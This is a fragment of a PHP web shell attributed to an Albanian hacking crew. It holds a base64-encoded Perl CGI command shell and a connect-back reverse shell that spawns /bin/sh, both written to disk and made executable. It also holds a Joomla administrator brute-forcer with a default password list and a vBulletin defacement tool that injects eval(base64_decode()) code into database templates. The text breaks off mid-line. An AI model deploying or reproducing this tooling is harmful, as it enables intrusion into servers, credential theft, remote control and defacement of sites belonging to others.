ogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K\';\r\n\r\n$file = fopen("izo.cin" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgishellizocin));\r\nfclose($file);\r\n    chmod("izo.cin",0755);\r\n$netcatshell = \'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh\r\nMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog\r\nICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo\r\nMSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg\r\nICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb\r\nMV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb\r\nKl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An\r\nKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf\r\nSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg\r\nICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF\r\nUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi\r\nVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu\r\nZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+\r\nJlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl\r\nbihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu\r\nICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE\r\nYXRhY2hlZFxuXG4iOw==\';\r\n\r\n$file = fopen("dc.pl" ,"w+");\r\n$write = fwrite ($file ,base64_decode($netcatshell));\r\nfclose($file);\r\n    chmod("dc.pl",0755);\r\n   echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe> \r\n\r\n \r\n </div>"; }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jbrute\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jbrute" method="post">\r\n\r\n\t<meta name="author" content="RetnOHacK" />\r\n    <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />\r\n    <meta name="description" content="RetnOHacK #Procoder\'z Team Albanian" />\r\n<center>\r\n</br></br>\r\n<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />\r\n<form method="post" action="" enctype="multipart/form-data"> \r\n<table class="tabnet" width="38%" border="0"><center>\r\n<th colspan="2">Joomla Brute Force</th>\r\n<tr><td><p ><font  class="d1">User :</font></th>\r\n<input class="inputz" type=\'text\' name="usr" value="admin" size="15"> </font></center><br /><br /></p>\r\n</td></tr>\r\n<tr><td><font class="">Sites list :</font> \r\n</td><td><font class="" >Pass list :</font></td></tr>\r\n<tr>\r\n\t\t<td>\r\n<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>\r\n</td><td>\r\n<textarea name="w0rds" style="background:black;" cols="40" rows="13" >\r\nadmin\r\n123456\r\npassword\r\n102030\r\n123123\r\n12345\r\n123456789\r\npass\r\ntest\r\nadmin123\r\ndemo\r\n!@#$%^\r\n</textarea>\r\n</td></tr><center><tr><td>\r\n<font > \r\n<input class="inputzbut" type="submit" name="x" value="start" id="d4"> \r\n</font></td></tr><br>\r\ntanks for procoder\'z team albanian<br></center></table>\r\n</form></center>\r\n<? \r\n@set_time_limit(0); \r\n\r\nif($_POST[\'x\']){ \r\n\r\necho "<hr>"; \r\n\r\n$sites = explode("\\n",$_POST["sites"]); // Get Sites \r\n$w0rds = explode("\\n",$_POST["w0rds"]); // Get w0rdLiSt \r\n\r\n$Attack = new Joomla_brute_Force(); // Active Class \r\n\r\n\r\nforeach($w0rds as $pwd){ \r\n\r\nforeach($sites as $site){ \r\n\r\n\r\n$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D \r\nflush();flush(); \r\n\r\n} \r\n\r\n} \r\n\r\n} \r\n\r\n\r\n# Class & Function\'z \r\n\r\nfunction txt_cln($value){  return str_replace(array("\\n","\\r"),"",$value); } \r\n\r\nclass Joomla_brute_Force{ \r\n\r\npublic function check_it($site,$user,$pass){ // print result \r\n\r\nif(eregi(\'com_config\',$this->post($site,$user,$pass))){ \r\n\r\necho "<span class=\\"x2\\"><b># Success : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";\r\n$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\\n"); fclose($f); \r\nflush(); \r\n}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} \r\n\r\n} \r\n\r\npublic function post($site,$user,$pass){ // Post -> user & pass \r\n\r\n$token = $this->extract_token($site); \r\n\r\n$curl=curl_init(); \r\n\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_POST,1); \r\ncurl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\'); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\npublic function extract_token($site){ // get token from source for -> function post \r\n\r\n$source = $this->get_source($site); \r\n\r\npreg_match_all("/type=\\"hidden\\" name=\\"([0-9a-f]{32})\\" value=\\"1\\"/si" ,$source,$token); \r\n\r\nreturn $token[1][0]; \r\n\r\n} \r\n\r\npublic function get_source($site){ // get source for -> function extract_token \r\n\r\n$curl=curl_init(); \r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\n} \r\n}\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'vb\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">\r\n   <br><br><br><div align="center">\r\n   <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">\r\n   <b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>\r\n   </div><br>\r\n   <?\r\n   if(empty($_POST[\'index\'])){\r\n   echo "<center><FORM method=\\"POST\\">";\r\n   echo "<table class=\\"tabnet\\">\r\n<th colspan=\\"2\\">Vb Index Changer</th>\r\n<tr><td>host </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"localhost\\" value=\\"localhost\\"></td></tr>\r\n<tr><td>database </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"database\\" value=\\"forum_vb\\"></td></tr>\r\n<tr><td>username </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"username\\" value=\\"user_vb\\"></td></tr>\r\n<tr><td>password </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"password\\" value=\\"vb\\"></td></tr>\r\n</tr>\r\n<th colspan=\\"2\\">Your Index Code</th></table><table class=\\"tabnet\\">\r\n<TEXTAREA name=\\"index\\" rows=\\"13\\" style=\\"background:black\\" border=\\"1\\" cols=\\"69\\" name=\\"code\\">your index code</TEXTAREA><br>\r\n<INPUT class=\\"inputzbut\\" type=\\"submit\\" value=\\"setting\\" name=\\"send\\">\r\n</FORM></table></center>";\r\n    }else{\r\n    $localhost = $_POST[\'localhost\'];\r\n    $database = $_POST[\'database\'];\r\n    $username = $_POST[\'username\'];\r\n    $password = $_POST[\'password\'];\r\n    $index = $_POST[\'index\'];\r\n    @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n    @mysql_select_db($database) or die(mysql_error());\r\n    $index=str_replace("\\\'","\'",$index);\r\n    $set_index = "{\\${eval(base64_decode(\\\'";\r\n    $set_index .= base64_encode("echo \\"$index\\";");\r\n    $set_index .= "\\\'))}}{\\${exit()}}</textarea>";\r\n    echo("UPDATE template SET template =\'".$set_index."\' ") ;\r\n    $ok=@mysql_query("UPDATE template SET template 